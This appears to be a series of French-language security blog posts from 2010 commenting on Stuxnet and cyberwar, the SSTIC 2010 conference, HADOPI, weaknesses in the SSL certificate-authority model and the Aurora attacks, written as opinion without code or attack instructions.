Le sabotage informatique est une activité à peu près aussi ancienne que l'informatique. En 1982 déjà, l'explosion d'un pipeline russe a très probablement été provoquée par le sabotage d'un système SCADA par la CIA. On doit pouvoir trouver des exemples similaires du côté de la fusée Ariane, même s'ils ne sont pas sur Wikipedia.

Aujourd'hui le PC sous Windows XP est effectivement devenu le consommable de base qui permet de contrôler à peu près tout et n'importe quoi. Un sabotage réussi aura toutes les chances d'impliquer de l'informatique à un moment ou un autre. Mais cela n'a rien de "magique" ou d'exceptionnel: c'est un métier !

Il est déjà assez simple (dans la plupart des cas) d'analyser des systèmes "fermés", comme le démontrent toutes les conférences de sécurité ces 15 dernières années, au cours desquelles les sujets les plus divers ont été abordés: logiciels propriétaires bien sûr, mais aussi faiblesses de conception des architecture PC, modems/routeurs, téléphones, consoles de jeu, radiocommunications comme le GSM ou le RDS/TMC, puces RFID, TPM, satellites, etc.

Si un étudiant arrive à pirater l'iPhone et la PlayStation 3 (avec un hyperviseur matériel conçu par IBM), on peut supposer que n'importe qui est capable de pirater un système SCADA avec très peu de moyens.

Mais si j'étais demain à la tête de l'opération "StuxNet 2", je ne m'embarrasserais pas des détails. Avec ses 427,000 collaborateurs, on peut supposer qu'il n'est pas trop difficile de pénétrer le réseau interne de Siemens. Il suffit ensuite d'aller y chercher la documentation et les codes sources nécessaires. Comme 100% des tests d'intrusion internes sont couronnés de succès, il n'est pas trop difficile d'être optimiste.

La présentation donnée par Val Smith lors de BlackHat 2010 sur le dynamisme de la "scène" chinoise permet de se rendre compte à quel point de telles opérations sont monnaie courante ... même si personne n'en parle.

Conclusion

Avant de coller le préfixe "cyber" à toutes les sauces, il est recommandé de passer le test suivant.

Car si une chose telle que la "cyberguerre" existe, elle ne ressemble ni à un DDoS, ni à StuxNet.

L'échec de la CyberGuerre

2010-10-04T08:00:00.022+02:00

Il n'est pas besoin d'introduire le "fameux" ver Stuxnet, tant les médias (y compris généralistes) se sont gargarisés de cette attaque.

Maintenant que les souches sont disponibles sur Internet, ainsi que des analyses techniques très détaillées, il m'est possible d'avancer quelques réflexions étayées sur le sujet.

Ce ver représente l'échec flagrant de la CyberGuerre, autre sujet d'actualité s'il en est.

Tout d'abord, commençons par une assertion totalement invérifiable: ce ver ciblerait une installation nucléaire iranienne. Brillante idée. Soit il s'agit d'endommager une vanne ou une pompe - ce qui se répare en quelques jours. Soit il s'agit de provoquer l'explosion de la centrale: un nouveau Tchernobyl en quelque sorte …

Notons que d'après F-Secure, la plateforme DeepWater Horizon utilisait les mêmes équipements Siemens PLC … Il ne faut pas en tirer de conclusions hâtives, mais sachant que ce ver va tourner pendant quelques années (les clés USB étant le vecteur d'infection numéro un aujourd'hui), on peut facilement imaginer que les dommages à venir risquent d'être importants … et imprévisibles.

Un code malveillant comme Stuxnet s'apparente à une arme bactériologique: même s'il semble verrouillé sur une cible donnée, sa propagation est globalement incontrôlable, et les dommages collatéraux peuvent être largement supérieurs à l'intérêt tactique de l'attaque. Il faut avoir des testicules en titane pour lâcher une telle bombe dans la nature, et espérer que ses propres systèmes – ni ceux de ses alliés – ne seront affectés ni par le ver lui-même, ni par les failles révélées (comme le mot de passe Siemens en dur, qui ne peut toujours pas être changé).

Regardons maintenant les dommages collatéraux de Stuxnet:

Faille "LNK" (MS10-046).

Cette faille ayant été corrigée en août 2010, les systèmes Windows XP antérieurs au SP3 (ainsi que les Windows XP Embedded compilés avant cette date) resteront éternellement vulnérables à cette faille d'exécution de code depuis une clé USB.

Faille "Spooler" (MS10-061).

Celle-là ne compte pas, car elle avait déjà été publiée dans le magazine Hakin9 il y a un an et demi. Il faut croire que personne au MSRC ne lit la presse "pirate" :)

Faille(s) d'élévation de privilèges.

Ces failles sont documentées dans les analyses techniques (et même disponibles sur étagère), mais non corrigées par Microsoft à l'heure où j'écris ces lignes. Il n'y a plus qu'à attendre les malwares qui vont les exploiter.

Bilan: les risques pour la sécurité informatique mondiale se sont durablement accrus, et la cible a été manquée. Sauf si le seul objectif de ce ver était d'augmenter les budgets alloués aux SCADA et à la CyberGuerre, bien sûr :) Bienvenue dans le mois du Cyber Awareness !

Un compte-rendu à froid de SSTIC 2010 (2ème partie)

2010-08-30T08:00:00.004+02:00

Est-ce qu'on est tous foutus ?

La conférence de clôture du SSTIC s'est aventurée sur de nombreux terrains, sans langue de bois (même si certains messages ont été délivrés à mots couverts). Difficile dans ces conditions de résumer, et surtout de produire une exégèse pertinente sur cette intervention, d'autant que je n'ai pas compris si les opinions personnelles de l'intervenant, ou la doctrine officielle de l'Etat français, y étaient exprimées. Je vais toutefois m'y essayer.

* *

Jetons un voile pudique sur l'idée que l'attaque est inutile à la défense. Cette idée a déjà été battue en brèche en séance, puis dans les compte-rendus ultérieurs publiés sur Internet. Je concède toutefois qu'il est inutile de chercher de nouvelles failles tant il en existe déjà. La faiblesse des mécanismes d'authentification dans les systèmes Windows est un problème déjà largement insoluble (attaque dite pass the hash, entre autres).

* *

Ce qui m'a le plus frappé, c'est d'entendre que face aux échecs flagrants et répétés de la sécurité informatique, l'une des solutions proposées consistait à déployer massivement des IDS.

Les IDS faisant partie des échecs les plus retentissants dans l'industrie de la sécurité, cette assertion a de quoi surprendre. Et pourtant elle est parfaitement justifiée, car son auteur ne cherche pas à protéger les systèmes, mais simplement à faire prendre conscience aux responsables de ces systèmes de l'étendue du désastre.

Je reste malgré tout circonspect. L'échec commercial des IDS, outre les limitations techniques des produits existants, s'explique aussi par la recherche de l'ataraxie. Pour exploiter un IDS, il faut engager des personnes compétentes dédiées au traitement des alertes, mettre en place des procédures, éventuellement impacter la production par du forensics, et toutes sortes de choses désagréables du même acabit. Dans ces conditions, ne rien voir est beaucoup plus confortable ^H^H^H beaucoup moins cher.

Dans le cas contraire, et comme le rappelle Michal Zalewski dans un billet original, quelques astuces permettent de réaliser un IDS du pauvre, pour peu que l'emplacement des "pièges" ne soit pas divulgué. Le plus cher dans la détection d'intrusion reste le traitement de l'incident, pas sa remontée. Déployer des IDS n'est que la première étape, que beaucoup n'ont jamais franchie. Wait and see.

* *

L'impasse dans laquelle se trouvent actuellement toutes les personnes en charge de la protection des systèmes s'explique par quelques fondamentaux déjà rappelés sur ce blog.

Le principal problème est que l'informatique grand public (ce qui couvre le matériel - ordinateurs personnels et téléphones mobiles, le logiciel, et les contenus/services disponibles) a complètement échappé à toute forme de contrôle par les clients finaux, y compris l'Etat.

Outre les exemples d'Apple et Google qui n'en font qu'à leur tête dans tous les domaines (ex. interopérabilité pour le premier et contenus numériques pour le deuxième), on peut également rappeler que :

La loi est tout simplement bafouée par les CLUF. Toutes les protections basiques du consommateur (ex. vices cachés) ne sont jamais appliquées aux logiciels.
Le budget de l'ANSSI est de 90 millions d'euros, alors que les simples revenus publicitaires de Google étaient de l'ordre de 10 milliards de dollars ... en 2006.
Comme le déplore l'intervenant, notre dépendance aux technologies étrangères est totale.

Par ailleurs, les technologies de l'information sont devenues une commodité, ce qui entretient dans l'esprit du grand public (j'entends par là toute personne dont l'informatique n'est pas le métier - ce qui s'étend jusqu'au plus haut niveau de l'Etat ...) que "ça marche tout seul" et "les constructeurs font plutôt bien leur boulot".

* *

Légiférer est l'un de seuls pouvoirs de l'Etat qui pourrait le distinguer d'un client ordinaire.

Mais force est de constater que le droit ne s'applique pas aux technologies de l'information – ou du moins pas de la même manière. Et que l'inflation des lois applicables aux nouvelles technologies s'effectue souvent en dépit du bon sens (HADOPI, LOPPSI et autres ayant déjà été largement traitées par ailleurs).

Sur Internet, le seul pouvoir est médiatique (effet de buzz). La CNIL avec ses contrôles en use habilement. Mais il me semble que les institutions étrangères restent meilleures que les nôtres dans ce domaine.

Il suffit de comparer les prises de position très claires du BSI allemand sur BlackBerry (un serpent de mer de la sécurité des Etats s'il en est). En France j'ai vaguement l'impression que chacun cherche au contraire à obtenir et à contrôler l'information – pour assurer sa supériorité sur son voisin ? – ce qui ne sert pas l'intérêt général mais alimente au contraire la rumeur, jusqu'à effacer les arguments techniques.

Le même phénomène s'est également produit avec Skype. Je porte d'ailleurs de grands espoirs sur la prochaine conférence CCC, où des révélations sur Skype pourraient avoir lieu, tout comme ce fût le cas pour BlackBerry lors d'une édition antérieure. La vérité vient toujours d'ailleurs ...

* *

Au final, culture de l'ambiguïté, contrôle de l'information et évangélisation de niveau zéro auprès des administrations ne font pas rêver les hackers.

Mes seuls rapports avec l'Etat 2.0 se limitent au paiement des impôts et des amendes (en attendant les emails d'avertissement HADOPI). Mais je sens s'éloigner le jour où je surferai sur l'Internet mondial (le vrai, pas celui des sites "autorisés") avec les résultats du projet SECSI. Le projet Qubes aura probablement été industrialisé avant, malgré son inutilité fondamentale.

Ajouté au fait que les carrières proposées sont médiocres (CDD 3 ans), et que les perspectives offertes à long terme sont du réseautage plus ou moins obscur, on peut comprendre les difficultés de recrutement de l'Etat dans le domaine de la SSI. Ainsi que le problème du maintien des compétences en France, comme le déplore régulièrement Fred Raynal dans ses éditos.

* *

Afin de ne pas être taxé de nihiliste invétéré, voici deux idées qui peuvent réellement changer la face de la sécurité informatique.

1. Appliquer les règles.

Le problème est qu'en France, on cherche à contourner les règles plutôt qu'à les adapter. Or si une règle est inapplicable, c'est qu'elle ne sert à rien ... Cela va du très ancien "tous les supports amovibles introduits dans la société doivent être scannés par le sas antivirus" jusqu'au très récent "l'usage des réseaux sociaux est interdit".

En ce sens, la lecture des avis du CERTA me procure toujours le même plaisir qu'à Kostya.

Que penser de ces délicieuses méthodes de contournement (workarounds) pour une faille dans Adobe Reader exploitée en "0day" dans la nature :

(...)
convertir les fichiers suspects au format PS puis de nouveau au format PDF sur une machine sas ;
n'ouvrir que des fichiers provenant de sources vérifiées et sûres.

Sachant qu'il existe à tout instant au moins une faille connue et exploitée en "0day" dans Adobe Reader (VUPEN ayant décidé de ne plus informer les éditeurs ;), je vous laisse le soin de trouver un outil de conversion PDF vers PostScript qui ne soit pas lui-même vulnérable ... et de déployer cette préconisation de manière permanente à l'échelle d'une entreprise.

Le seul moyen de produire des règles applicables ... c'est de se les appliquer à soi-même. Car on ne devrait pas être plus exigeant avec les autres qu'on ne l'est avec soi-même. Et là encore, la France est championne de "l'exception VIP" (tout en restant dans le domaine de la sécurité informatique et pas celui de la fraude fiscale).

2. Mettre en place un contrôle sanitaire sur les logiciels.

J'approuve complètement le principe du CSPN. Mais à l'heure où j'écris ces lignes, seule une poignée de logiciels totalement inexistants en entreprise a été certifiée. Certifier 10 logiciels en 3 ans, c'est tenter d'éponger l'océan de l'industrie logicielle avec un coton-tige.

On objectera que les ressources nécessaires seraient titanesques. Mais dans ce cas, pourquoi ne pas mutualiser les travaux réalisés de manière indépendante et en doublon par tous les acteurs du marché ?

Il suffirait pour cela de réglementer la profession d'auditeur en sécurité, et de déposer tous les rapports d'audit dans un "pot commun" accessible à tous. Ainsi un auditeur pourrait faire bénéficier ses clients de l'expertise antérieure de ses pairs. Voilà qui éviterait de refaire auditer cent fois le même produit, avec des résultats très aléatoires selon l'intervenant ... Et au final, profiter de l'effet de buzz pour obliger les éditeurs à s'améliorer.

Bien sûr, on peut aussi suspecter que la quasi-totalité des logiciels commerciaux échoueraient à une certification sécurité, même de "premier niveau". Et c'est bien là le drame.

Dans le registre des idées plus farfelues, après avoir dépensé 1 milliard d'euros pour vacciner contre la grippe A, ne serait-il pas judicieux de mettre en place des centres de vaccination pour clés USB ? Cela permettrait de protéger la population (et les entreprises) contre le vecteur d'infection n°1 aujourd'hui ...

Autre idée: interdire complètement l'utilisation de tout langage de programmation non sûr (qui a dit PHP ? ;), y compris dans les écoles. Vous pensez que je vais trop loin ? C'est pourtant ce que les américains s'apprêtent à voter.

* *

Enfin, pour conclure sur une note positive, et contrairement à ce que j'ai pu lire ailleurs, je sais de source sûre que l'Etat recrute d'anciens hackers en dehors des écoles dites "groupe A". Du moins si par "hacker" on entend "personne compétences en informatique qui maitrise tous les aspects de son art, y compris les plus obscurs". C'est toujours ça de pris.

Les commentaires sont ouverts ! :)

Interlude d'actualité

2010-08-12T08:00:00.002+02:00

"Un peuple qui a quarante mille lois n'a pas de loi."
– Honoré de Balzac

En attendant la deuxième partie de mon compte-rendu du SSTIC, je ne peux pas m'empêcher de commenter l'actualité récente. Et je ne parle pas de la faillite du site Jiwa (dont Sid s'est très bien fait l'écho), même si mon sujet est connexe : il s'agit du cahier des charges afférent aux Mesures Techniques de Protection, censées protéger l'internaute des foudres d'HADOPI.

Bien que ce document soit marqué "confidentiel - ne pas diffuser" et distribué au compte-gouttes, Numerama s'est néanmoins permis de le publier en accès libre – ce qui permet de le commenter. Espérons que chaque copie ait été "watermakée" :)

Comme prévu, les solutions envisagées sont :

soit l'installation d'un logiciel sur le poste de l'utilisateur ;
soit l'installation d'un logiciel dans la Box du client.

Et comme cela était malheureusement prévisible, il n'est pas fait mention de la sécurité des processus de développement, ni des méthodes de vérification/certification applicables. On s'oriente donc à nouveau vers des logiciels développés en C (ou en PHP) par des stagiaires, avec tous les risques (démontrés) que cela comporte. Cela promet néanmoins des développements juridiques intéressants.

Mais compte-tenu du fait que les premiers emails seront envoyés bien avant la disponibilité de ces fameux outils de protection, on peut compter sur le fait que l'ensemble des internautes concernés feront profil bas … gratuitement et sans risque !

La mise à disposition d'un logiciel destiné aux postes Windows est de toute façon inutile : il restera possible de regarder du streaming sur son iPad, et Apple refusera de signer et/ou diffuser l'application HADOPI, conformément à sa politique. Il restera donc à légaliser le jailbreaking en France et à diffuser l'application HADOPI sur Cydia :)

L'intégration à la Box du client est une solution plus intéressante. Elle est toutefois trivialement contournable, puisque rien n'oblige le client à utiliser la Box de son FAI. Ni à utiliser le logiciel fourni par son FAI, le logiciel de la NeufBox 4 étant par exemple recompilable presque entièrement à partir des sources. Sauf à placer un TPM dans chaque Box, il sera donc impossible de contrôler l'équipement de connexion utilisé par les clients.

* *

Une autre actualité intéressante est la décision de justice obtenue par l'ARJEL, qui impose aux FAI de filtrer le site de paris en ligne www.stanjames.com. Notez que l'ARJEL a invoqué la protection des mineurs et la lutte contre le financement du terrorisme pour arriver à ce résultat. Ça marche à tous les coups (ou presque).

A titre personnel, il me semble extrêmement hasardeux de jouer sur un site qui n'a pas été agréé par l'ARJEL. L'ARJEL compte d'excellents techniciens. Les exigences de sécurité produites sont sérieuses et vérifiées avec soin, ce qui permet d'éviter de nombreuses fraudes.

Néanmoins cette décision relance encore une fois le débat sur la neutralité du Net. Il est évident que si l'ARJEL crée un précédent juridique, toutes les personnes ayant connu des déboires en ligne (éditeurs de contenus, hommes politiques, scientologues, et autres) vont s'abattre sur Internet comme la vérole sur le bas-clergé.

Accessoirement, en fonction des mesures effectivement mises en place par les FAI (ou pas), je vous laisserai vous exprimer dans les commentaires pour suggérer les méthodes de contournement les plus élégantes. Mais le fond du débat n'est pas technique. D'ailleurs il semblerait que cette fois-ci, l'éditeur du site se soit sabordé de lui-même.

* *

Ces deux actualités laissent à penser qu'on s'oriente vers la nécessité de disposer d'un équipement de connexion "approuvé" pour pouvoir accéder à un Internet dont le contenu est soigneusement contrôlé. Ça ne vous rappelle rien ? Ça n'est sans doute pas pour rien que le pôle Sytem@tic a donné des sous à Archos pour construire le Minitel 2.0 !

"Corruptissima republica plurimae leges"

Promis j'arrête les citations :)

Un compte-rendu à froid de SSTIC 2010 (1ère partie)

2010-06-28T22:00:00.000+02:00

Ça y est, SSTIC 2010 est mort et enterré. Désormais ce sont HITB Amsterdam, BlackHat US et Defcon 18 qui font le buzz. Un clou chasse l'autre.

Quant à SSTIC 2010, les comptes rendus techniques détaillés ne manquent pas, c'est pourquoi je ne vais absolument pas vous décrire les conférences par le menu. Ce qui m'intéresse c'est plutôt de répondre à quelques questions essentielles concernant le SSTIC.

Le SSTIC est-il une conférence élitiste ?

Bien sûr ! N'importe quel participant à SSTIC combine les trois facteurs suivants (hors agences gouvernementales) :

Il peut se payer une conférence à 240 euros (ce qui reste malgré tout raisonnable comparé aux conférences anglo-saxonnes) ;
Il peut s'absenter 3 jours consécutifs de son poste de travail (parfois sans prendre de congés) pour partir à Rennes, ce qui démontre une grande liberté au sein de son entreprise (par exemple c'est un chercheur) ;
Il peut malgré tout payer avec une CB en moins de 36h sur un site ne supportant qu'Internet Explorer, ce qui prouve qu'il s'abstrait du processus d'achat de son entreprise.

Le public du SSTIC est donc trié sur le volet par ces prérequis. Si vous cherchez une conférence pas chère, facile d'accès et hors temps de travail, il faut plutôt vous tourner vers la Nuit du Hack. Vous ne serez pas dépaysés : dans les deux cas, les sponsors sont venus pour recruter.

La DGSE sait-elle casser RSA-1024 ?

Visiblement demander à la DGSE si RSA-1024 est à la portée de ses puissances de calcul considérables (4ème plus gros client mondial de la société Xilinx, de l'aveu de l'intervenant) rend intelligent. Je suis flatté :)

Néanmoins la question reste pertinente, quand on voit que l'ANSSI écrit :

"Depuis 2004, l'ANSSI recommande d'utiliser des tailles de clés RSA d'au moins 1536 bits, soit exactement le double de la taille qui vient d'être factorisée, pour un usage ne dépassant pas l'année 2010. Cette exigence est portée à 2048 bits pour un usage ne dépassant pas 2020. Ces tailles de clés, portées par le référentiel général de sécurité (RGS), permettent de garantir un bon niveau de sécurité au vu de l'état de l'art cryptographique et des puissances de calcul actuels."

Tout le problème (l'intervenant n'a pas manqué de le soulever) consiste à déterminer si une faille est plus utile en attaque ou en défense. C'est aussi le cas des backdoors, qui ne sont que des failles introduites à dessein.

Contrairement à ce qu'on pourrait penser, concevoir une bonne backdoor n'est pas simple. Par exemple les affaiblissements cryptographiques placés dans les versions françaises de Windows sont catastrophiques, car elles permettent à toute personne qui en a connaissance de nous attaquer, alors que les autres n'y sont pas vulnérables.

La récente backdoor dans UnrealIRCd appartient à la catégorie des "mauvaises" backdoors : toute personne qui en a connaissance peut l'exploiter. On peut noter toutefois qu'il s'agit d'un cas d'école de dissimulation de code source, qui remonte au moins à novembre 2009. Je ne ferai pas de commentaire sur la sécurité induite par la disponibilité du code source :)

La backdoor dans (feu) SecurityBox Freeware était mieux faite, car elle n'était utilisable que par celui qui détient la partie privée de la clé de recouvrement … RSA-1024 !

En résumé, laisser croire aux civils que RSA-1024 est sûr en 2010 me semblerait être un jeu dangereux, s'il s'avérait que n'importe quel gouvernement sait le "casser". Mais je ne m'attendais pas à une réponse :)

La conférence sur Facebook était-elle bien ?

De nombreux comptes rendus soulignent l'intérêt et la qualité de la conférence sur les attaques Facebook, d'autant qu'elle a été assurée par des stagiaires n'ayant pas une grande expérience des interventions publiques (si j'ai bien compris).

Je n'ai jamais douté du fait que des stagiaires (bien encadrés) soient capables de produire du travail de qualité :)

Mais il me semble que les gens viennent dans les conférences de sécurité comme au cirque : pour se faire peur. En tout cas c'est ce qui ressort des communications agressives telles que celle de Laurent Oudot avant SyScan ou de l'éternel « Big One » promis chaque année à Black Hat US – sans parler de la conférence iAWACS (International Alternative Workshop on Aggressive Computing and Security) sous-titrée "the no-limit workshop" pour ceux qui n'auraient pas compris.

Dans ces conditions, toute intervention qui vient avec une aura « offensive » bénéficie d'une surprime non négligeable sur une intervention « défensive ». Notez que cela ne me choque pas à titre personnel (je fais partie du spectacle), mais ça fait tâche avec le discours de clôture évoquant la prépondérance de la défense sur l'attaque dans la doctrine gouvernementale et l'intérêt marginal à découvrir de nouvelles failles alors qu'on peine à corriger les failles connues.

La conférence sur OPA était-elle de trop ?

Voilà un sujet polémique comme je les aime :) Il suffit de suivre l'échange de commentaires sur le blog de Cédric Blancher, et le billet entièrement consacré à cette conférence, pour voir que la critique (même constructive) déchaîne les passions.

Pour essayer de m'insérer subtilement dans le débat, il me semblerait faux de dire que SSTIC donne la prime aux vieux cons (comme moi). D'ailleurs n'ai-je point dit le plus grand bien de la conférence sur le hacking Facebook ? :)

Maintenant, il est clair que l'objectif d'une conférence de 30 minutes n'est pas d'apprendre quelque chose à l'auditoire. Je ne pense pas que quelqu'un soit capable d'initialiser la structure VMCS du processeur Intel après avoir vu la présentation sur VirtDbg.

L'objectif est de "montrer ce qui se fait", et in fine d'esbaudir l'auditeur pour lui délivrer un message. D'ailleurs les conférences américaines à spectacle (de type Black Hat) font venir des intervenants récurrents et rémunérés pour assurer le spectacle (Dan Kaminsky, Joanna Rutkowska, H.D. Moore, etc.). En ce sens la conférence d'Eric Barbry était parfaite :)

J'ai regardé l'outil OPA et techniquement il mérite d'être sauvé. Car il tente de réaliser le vieux rêve de l'informatique moderne (dont il a encore été question au Forum Atena aujourd'hui) : repartir de zéro. Faire table rase des erreurs du passé, et proposer un système nativement sûr aux développeurs.

Malheureusement la présentation qui en a été faite était de loin la plus élitiste … car j'ai quand même vaguement eu l'impression d'avoir été pris pour un neuneu ! Et là, le message n'est pas forcément passé.

Est-ce qu’on est tous foutus ?

Désolé, mais mon commentaire sur la conférence de clôture fera l'objet d'un billet à part entière :)

SSL est cassé

2010-04-20T11:15:00.001+02:00

(Notez que j'ai soigneusement évité "l'échec de SSL" comme titre, mais je n'en pense pas moins :)

Ce dont je ne vais pas parler

Si vous êtes un tant soit peu versés dans la technique, vous avez probablement entendu parler de la factorisation d'une clé RSA-768 par l'INRIA.

La puissance de calcul mise en œuvre pour cette "prouesse" laisse penser que la NSA sait faire la même chose en une semaine (sans parler de notre machine TERA, bien française).

Accessoirement, il est amusant de constater que des clés 768 bits sont utilisées par les cartes EMV en remplacement de la clé 320 bits qui a été factorisée par Serge Humpich …

… mais RSA-1024 reste aujourd'hui impossible à factoriser par le grand public.

Vous avez également entendu parler de SSLStrip, par Moxie Marlinspike.

Une attaque man-in-the-middle "basique" qui réécrit les liens HTTPS en HTTP. Très efficace contre les moldus de l'informatique … mais qui n'affecte pas les outils automatiques (bien configurés) ou les geeks qui ont mis tous les sites critiques en "HTTPS forcé" dans NoScript (ou qui utilisent des add-ons dédiés).

Vous avez entendu parler de l'attaque d'Alexander Sotirov, ayant exploité les faiblesses de MD5 pour générer une "vraie-fausse" autorité de certification parfaitement valide et largement reconnue ?

Beau travail … mais la plupart des implémentations ont blacklisté ce certificat.

Vous avez entendu parler de l'attaque en renégociation, qui permet d'injecter des données en aveugle au début d'une session TLS ?

Désolé … mais là encore c'est patché presque partout.

Vous êtes assez vieux pour avoir entendu parler de la faille OpenSSL exploitée par le ver Slapper en 2002 ?

C'est patché partout … ou presque (n'est-ce pas PolyCom ? ;).

Vous avez entendu parler d'un "petit problème" d'entropie dans Debian ?

Rassurez-vous, ça devrait normalement être patché (presque) partout …

Vous utilisez GnuTLS ?

Bon là c'est sans espoir, désolé !

Bref, vous êtes un technicien. Mais saviez-vous que le modèle SSL est fondamentalement cassé ?

La faille dans SSL

SSL, un protocole conçu par Netscape pour le e-commerce, est là pour assurer la confiance.

Pour faire simple, il existe deux modèles de confiance en informatique: le modèle "pair à pair", utilisé par GPG, et le modèle "à site central", utilisé par SSL.

Dans le premier modèle, vous faites confiance à un inconnu parce que vous l'avez rencontré au moins une fois, ou quelqu'un que vous connaissez l'a rencontré au moins une fois. C'est relativement fiable (quoique l'expérience des réseaux sociaux montre qu'on a tendance à faire confiance un peu trop vite), mais ça passe difficilement à l'échelle.

Dans le deuxième modèle, vous faites confiance à un inconnu parce qu'il existe une autorité d'enregistrement mondiale qui a "vérifié" tous les inconnus. Ca passe très bien à l'échelle, mais ça suppose une confiance inébranlable dans l'autorité "racine". Or c'est là que le bât blesse.

Car l'autorité ne gagne pas d'argent (oui, accessoirement, c'est une activité lucrative) à chaque fois que vous désirez vérifier l'identité d'un inconnu. L'autorité gagne de l'argent à chaque fois qu'elle enregistre un nouvel inconnu. Et donc son business model est d'enregistrer un maximum d'inconnus le plus rapidement possible, en minimisant les vérifications.

Ceci étant posé, quelles sont alors les véritables attaques contre SSL ?

Les "fusions acquisitions"

Et oui, la vie est dure, et vendre de la confiance ne rapporte pas suffisamment d'argent. Il y a donc des autorités racines qui ont duré moins longtemps que leur certificat (soit 20 ou 30 ans) et qui ont été rachetées.

C'est ainsi qu'on a pu voir sur la liste des développeurs Mozilla une discussion intéressante autour de la question "qui possède la racine RSA Security 1024 V3 ?".

Tout est bien qui finit bien, puisque la racine en question appartenait bien à la société RSA, qui avait simplement arrêté de maintenir les points de contact identifiés dans la CA. Et qui a donné son feu vert pour supprimer purement et simplement cette CA de la liste des autorités racine de confiance.

Aucune autorité "majeure" n'a complètement disparu à ma connaissance, mais je n'exclus pas que le HSM d'une autorité racine puisse se retrouver un jour en vente sur eBay …

La sous-traitance

Pour vendre partout, il faut passer par des partenaires locaux. Par exemple en France, Gandi revend des certificats signés par "UTN – DATACorp", c'est-à-dire Comodo.

Les partenaires n'adhèrent pas forcément avec zèle à la DPC du fournisseur. C'est ainsi qu'un "vrai-faux" certificat Mozilla a pu être obtenu sans aucune vérification auprès d'un sous-traitant de Comodo.

Pourtant d'un point de vue technique, la "confiance" est binaire: soit le navigateur accepte le certificat, soit il le rejette. Il n'y a pas de score attaché au sous-traitant qui a délivré le certificat …

La prolifération des autorités racines

Entendons nous bien: je parle ici des "vraies" autorités, celles qui paient pour être intégrées à Windows ou aux navigateurs.

Le débat a enflammé la liste de discussions des développeurs Mozilla: faut-il intégrer une autorité de certification chinoise par défaut dans le navigateur ?

Sans rentrer dans le débat politique, on notera qu'il existe déjà plein d'autorités nationales. Comme une autorité hongroise, dont la DPC n'a pas été traduite dans d'autres langues que le hongrois. Difficile de construire la confiance la dessus ...

L'appât du gain

Je ne parlerai pas de la supercherie qu'est EV-SSL, c'est-à-dire une tentative pour mettre fin à ces dérives sur le principe du "plus les gens paient cher, plus on peut leur faire confiance". Ou, pour le dire autrement, "les gens les plus riches sont forcément les plus honnêtes" …

Non, la dérive dont je veux parler, c'est la délivrance de certificats gratuits, mais à courte durée de vie. C'est évidemment un abus de confiance: s'il est possible d'obtenir chez VeriSign un certificat de signature d'une durée de vie de 60 jours sans présenter aucun justificatif, alors cela permet de compromettre l'iPhone, mais également de signer un exécutable ou une macro Office pour une attaque "one shot".

L'interception légale

Last but not least, il faut noter que les équipements d'interception légale pratiquent le spoofing SSL sans problème. Comment ? Tout simplement avec la coopération de quelques autorités racine nationales, qui délivrent les certificats ad-hoc. Vous pourrez lire le papier ici, ou le compte-rendu dans la presse.

Y a-t-il une solution ?

Pour être honnête, je ne pense pas qu'une solution puisse venir du "marché". Car si la confiance a un prix, alors il y aura toujours quelqu'un pour payer. Après tout la mafia russe a bien monté son propre FAI, pourquoi n'aurait-elle pas sa propre autorité de certification ?

La solution technique théorique au problème est la révocation. Mais ça ne marche pas du tout. Par exemple la sécurité du système Symbian 9 est basée sur ce mécanisme, mais les opérateurs de téléphonie mobile ne l'activent pas (pour des raisons essentiellement économiques).

Et quand VeriSign a délivré un "vrai-faux" certificat Microsoft, il a bien fallu pousser une liste de révocation "en dur" par Windows Update, car aucun client ne vérifiait correctement les révocations.

En attendant, les geeks peuvent toujours utiliser des extensions comme "Perspectives" ou "Certificate Patrol". Ca peut toujours servir ;)

Ma conclusion est simple: le modèle de sécurité des autorités de certification ne vous protège que contre les attaques passives (écoute d'une connexion SSL). Mais pas contre les attaques actives (man-in-the-middle SSL, authentification par certificat client, signature de code, etc.). Et ça n'est pas prêt de changer.

Interlude récréationnel

2010-01-23T20:30:00.000+01:00

Petite perle dans ma mailbox ce matin (je vous donne la version Twitter car je ne crois pas que la newsletter soit archivée en ligne).

Et pourtant, il y a 3 ans déjà ...

PS. J'en profite pour signaler que j'ai ouvert il y a quelques temps un Fail Blog personnel ... pour ce genre d'anecdotes qui ne justifient pas un billet complet.

Aurora FAIL

2010-01-21T09:00:00.001+01:00

Je ne vais pas faire l'insulte à mes lecteurs de revenir sur le déroulement de ce qu'il est convenu d'appeler "l'opération Aurora".

A peu près tous les vendeurs d'antivirus, de HIPS et de NIPS vous ont déjà sensibilisés au fait que leur produit aurait permis de bloquer cette attaque (sauf que les 30+ entreprises concernées - dont Symantec -disposaient déjà probablement de nombreux produits de sécurité actifs sur leur réseau, mais c'est un autre débat).

Au final, toute cette histoire aura été l'occasion d'un FUD considérable sur Internet, et d'une superbe opération de communication de la part de Google qui se pose en champion de la liberté.

FAIL#1 Ce qui me choque le plus, c'est qu'une société aussi innovante que Google soit à la merci d'une faille dans Internet Explorer 6. Moi qui pensait qu'ils utilisaient Chrome ;)

Compte-tenu de l'historique de sécurité d'Internet Explorer 6, et du nombre de failles "annexes" qui peuvent être déclenchées automatiquement par le biais de ce navigateur (tous les ActiveX et les codecs installés localement, ainsi que Acrobat Reader, Flash, ShockWave, QuickTime, RealPlayer ...), la conclusion évidente est que surfer sur Internet avec IE6 sans protection (ex. SandBoxIE ou au minimum DropMyRights) est juste parfait pour attraper le SIDA, la syphilis et la variole de l'informatique.

Toute entreprise dont la sécurité interne dépend directement de la sécurité d'IE6 est condamnée à l'infection. Avec le nombre de gens brillants en charge de la sécurité chez Google, j'aurais cru cette vérité comme évidente pour eux.

Personnellement, je ne sors plus qu'avec FireFox + NoScript, et encore je me méfie de la surface d'attaque offerte par le plugin NoScript lui-même ...

FAIL#2 "Les attaques proviennent de la Chine".

Dans le cas de Google, il est fort probable qu'il s'agisse d'un insider job depuis leur bureau en Chine. Toute personne qui a ouvert un bureau ou une usine en Chine sait que ce scénario est très crédible.

Mais quand on regarde le schéma global de toutes les attaques, très peu d'adresses IP sont effectivement situées en Chine. N'importe qui aurait pu faire l'acquisition de cette faille IE (comme il s'en vend plein sur Internet). Et la "sophistication" des attaques reste à démontrer ... car après tout il s'agit juste de déposer des exécutables sur le système de la victime, utilisant un protocole basé sur le chiffrement "XOR" avec une clé de 1 octet. N'importe quel pare-feu personnel devrait être capable de détecter ce type d'activité anormale.

